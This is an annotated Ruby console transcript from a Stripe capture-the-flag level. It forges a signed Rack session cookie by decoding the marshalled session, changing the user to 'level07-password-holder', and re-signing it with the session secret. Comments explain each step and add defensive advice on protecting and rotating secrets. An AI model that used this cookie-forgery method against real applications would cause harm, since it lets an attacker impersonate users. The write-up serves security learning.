Stripe CTF Level 06 Session/Cookie Hack
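// See https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb for how Rack::Session::Cookie builds and checks the cookie value: base64 of the marshalled session hash, then "--", then a hex HMAC-SHA1 keyed with the application's session secret. The IRB session below repeats those steps by hand. | |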
# Step 1: load the base64 payload of an existing session into `data`.
# It is typed as a multi-line string literal, so `data` keeps a "\n" after
# every 60-character line (see the echoed value) and the HMAC below is
# computed over exactly that text, newlines included.
# NOTE(review): presumably this is the part of the cookie before "--"; the
# original cookie itself is not shown in the transcript.
1.9.3p194 :096 > data = "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5 | |
1.9.3p194 :097"> OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F | |
1.9.3p194 :098"> TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy | |
1.9.3p194 :099"> Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5 | |
1.9.3p194 :100"> Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw | |
1.9.3p194 :101"> YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx | |
1.9.3p194 :102"> MDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3 | |
1.9.3p194 :103"> VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p | |
1.9.3p194 :104"> ZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh | |
1.9.3p194 :105"> ZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA== | |
1.9.3p194 :106"> " | |
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3\nVDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p\nZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh\nZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n" | |
# Step 2: hex-encoded HMAC-SHA1 of the base64 text, keyed with `secret`.
# `secret` is never assigned in the visible transcript; it has to come from
# an earlier part of the IRB session.
# NOTE(review): presumably this digest was compared with the signature on the
# server-issued cookie to confirm the secret is the right one; not shown.
# Defender's view: this keyed hash is the only integrity control on the
# cookie, so the session secret must never be readable by application users.
1.9.3p194 :107 > OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data) | |
=> "6310248bab6197cf93953a16a9a407f862bce45a" | |
1.9.3p194 :108 > | |
1.9.3p194 :117 > | |
# Step 3: base64-decode the payload (`unpack('m')`) and Marshal.load it back
# into a Hash, which replaces the string previously held in `data`.
# No key is used here: the cookie is signed, not encrypted, so every field in
# the session (user, csrf token, session_id, tracking hashes) is readable by
# whoever holds the cookie.
# Marshal.load is tolerable in this console only because the input is the
# operator's own cookie. On a server it must run only after the HMAC check
# has passed, and a leaked secret removes that protection too.
1.9.3p194 :118 > data = Marshal.load(data.unpack('m').first) | |
=> {"tracking"=>{"HTTP_USER_AGENT"=>"6906a924698f710c8960792ba519ea285ecbed86", "HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794", "HTTP_ACCEPT_LANGUAGE"=>"dd065ed263c67d799f943ab6c39b55c5e008cbb5"}, "csrf"=>"57e34024aba4b0c5a93482cdb3310ef155351c22224b41087f90162cc8107d1b", "user"=>"philfreo", "csrf.token"=>"39dQjjZWK7T4r4VNdTZHBvupvCEvtllfGIbzMC9Wl1s=", "session_id"=>"20b2353b5fd6520b3b4587ae84da93f228b5e349fafd789ddc39888c9970ac1d"} | |
# Step 4: overwrite only the identity field. session_id, csrf and the
# tracking values stay exactly as issued, so a server that also records
# which user each session_id belongs to could detect the mismatch.
1.9.3p194 :119 > data['user'] = 'level07-password-holder' | |
=> "level07-password-holder" | |
# Step 5: reverse the decode: Marshal.dump the modified Hash and base64-encode
# it with pack('m'), which again emits newline-separated 60-character lines.
1.9.3p194 :120 > data = [Marshal.dump(data)].pack('m') | |
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j\nc3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ\nYnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4\nN2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n" | |
# Step 6: sign the new base64 text with the same `secret`, using the same
# HMAC-SHA1 hexdigest call as for the original payload. Anyone holding the
# secret can produce a signature the server cannot tell from its own.
1.9.3p194 :121 > sig = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data) | |
=> "992cee0782e5fad2157f777bf27eca32979cb411" | |
1.9.3p194 :122 > | |
1.9.3p194 :123 > | |
1.9.3p194 :124 > | |
# Step 7: print the finished cookie value, "<base64 payload>--<hex HMAC>".
# `<<` appends in place, so after this line `data` itself ends with "--" and
# the signature.
# Defender's view: nothing in this value marks it as client-made. Once a
# session secret has been exposed, the fix is to rotate it, which invalidates
# every outstanding cookie. Keeping authorization-relevant state server-side
# limits what a forged cookie can claim.
1.9.3p194 :125 > puts data << '--' << sig | |
BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5 | |
OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F | |
TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy | |
Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5 | |
Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw | |
YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx | |
MDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j | |
c3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ | |
YnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4 | |
N2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA== | |
--992cee0782e5fad2157f777bf27eca32979cb411 |